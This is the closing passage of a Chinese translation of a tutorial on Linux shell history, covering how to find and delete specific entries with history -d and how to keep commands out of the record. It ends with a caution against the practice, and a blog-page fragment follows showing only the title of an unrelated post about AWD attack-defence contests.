它将环境恢复原状,也就是你完成了你的工作,执行上述命令之后的命令都会出现在历史中。

5. 从历史记录中删除指定的命令

现在假设历史记录中已经包含了一些你不希望记录的命令。这种情况下我们怎么办?很简单。直接动手删除它们。通过下面的命令来删除:

  1. history | grep "part of command you want to remove"

上面的命令会输出历史记录中匹配的命令,每一条前面会有个数字。

一旦你找到你想删除的命令,执行下面的命令,从历史记录中删除那个指定的项:

  1. history -d [num]

下面是这个例子的截图。

第二个 ‘echo’命令被成功的删除了。

(LCTT 译注:如果你不希望上述命令本身也被记录进历史中,你可以在上述命令前加个空格)

同样的,你可以使用向上的箭头一直往回翻看历史记录。当你发现你感兴趣的命令出现在终端上时,按下 “Ctrl + U”清除整行,也会从历史记录中删除它。

总结

有多种不同的方法可以操作 Linux 命令行历史来满足你的需求。然而请记住,从历史中隐藏或者删除命令通常不是一个好习惯,尽管本质上这并没有错。但是你必须知道你在做什么,以及可能产生的后果。



via: https://www.maketecheasier.com/linux-command-line-history-incognito/

2022年7月1日星期五

浅谈AWD攻防赛的生存攻略

无法查看这则摘要。请 点击此处查看博文。